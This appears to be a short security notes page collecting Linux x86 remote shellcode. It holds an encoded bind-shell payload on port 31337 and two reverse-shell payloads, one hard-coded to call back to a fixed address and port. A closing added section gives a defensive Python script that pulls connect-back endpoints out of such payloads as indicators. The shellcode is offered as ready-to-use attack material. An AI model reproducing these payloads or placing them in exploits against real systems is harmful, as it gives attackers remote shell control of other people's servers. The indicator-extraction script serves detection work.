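Useful shellcode (remote)
Bind shell: opens another port on the attacked server and spawns a shell on it
Reverse shell: makes the server connect back to a port the attacker has open
131-byte bind shell code, bind port: 31337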
"\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"
Reverse shell: https://www.exploit-db.com/exploits/25497/
/* IPADDR and PORT are string-literal macros that must be defined before this array:
   the 4-byte IPv4 address and the 2-byte port, both in network byte order. */
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR
"\x66\x68"
PORT
"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";
shellcode=\
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"+\
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\xd3\x37\x02\x68"+\
"\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"+\
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
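A reverse shell has to carry the address it connects back to, so a captured payload yields that endpoint as an indicator for firewall and log searches. The following is an added example, not part of the original post: it recovers the pushed `sockaddr_in` from the two reverse-shell layouts shown above. The names `extract_endpoints`, `FORM_A`, `FORM_B` and the constructed fragment (documentation address 192.0.2.10, port 4444) are assumptions made for the illustration.

```python
import re
import socket
import struct

# Reverse-shell payload copied from the page (the "shellcode=" block above).
PAGE_SHELLCODE = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    b"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\xd3\x37\x02\x68"
    b"\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
    b"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# Constructed fragment (not from the page) in the layout of the exploit-db
# listing, with IPADDR/PORT replaced by documentation values 192.0.2.10:4444.
# It is only the sockaddr-building part, not a complete payload.
CONSTRUCTED_FRAGMENT = b"\xb3\x02\x68\xc0\x00\x02\x0a\x66\x68\x11\x5c\x66\x53"

# Both layouts build sockaddr_in on the stack with pushes:
#   A: push imm32 <ip>; push imm32 <AF_INET=2, little-endian word><port, big-endian>
#   B: push imm32 <ip>; push imm16 <port, big-endian>; push bx (bx holds AF_INET)
FORM_A = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)
FORM_B = re.compile(rb"\x68(.{4})\x66\x68(.{2})\x66\x53", re.DOTALL)

def extract_endpoints(payload):
    """Return a list of (ip, port) for every pushed sockaddr_in found."""
    found = []
    for pattern in (FORM_A, FORM_B):
        for m in pattern.finditer(payload):
            ip = socket.inet_ntoa(m.group(1))          # bytes are already network order
            (port,) = struct.unpack(">H", m.group(2))  # port is stored big-endian
            found.append((ip, port))
    return found

if __name__ == "__main__":
    for name, blob in (("page", PAGE_SHELLCODE), ("constructed", CONSTRUCTED_FRAGMENT)):
        print(name, extract_endpoints(blob))
```

Static patterns like these only match payloads that are not encoded; a payload wrapped in a decoder stub has to be decoded or emulated before the same search applies.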